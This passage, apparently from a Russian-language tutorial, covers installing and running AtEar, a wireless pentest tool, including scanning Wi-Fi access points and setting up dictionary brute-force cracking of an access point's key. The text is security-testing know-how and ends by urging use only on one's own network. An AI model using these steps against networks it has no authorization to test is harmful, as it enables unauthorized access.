9. python-sqlite.
10. python-pip.

Код:

Установка и запуск.
# git clone https://github.com/NORMA-Inc/AtEar.git
# cd ./AtEar/
# sudo bash install.sh
Пример запуска - python run.py --iface wlan0
Если увидим: Start AtEar-Beta....
Changing Monitoring mode...
То все работает.
Переходим по http://0.0.0.0:8080/
Нажимаем Go. Переходим в категорию "Wireless Scan". Далее нажимаем "Start".
И увидим точки доступа Wifi.

Если хотим проверить точку доступа. После заходим в категорию "Pentest" ---- "Ap select" --- выбираем точку доступа ---- next. Далее в категорию "Pentest Options". Настраиваем для брута. В "Keycracking Option" выбираем "Dictionary" -----"Dictionary Options" ------ отмечаем Password List -- next.

Заключение

Используейте данный инструмент для защиты и проверки своей корпоративной сети , дабы не нарушить закон.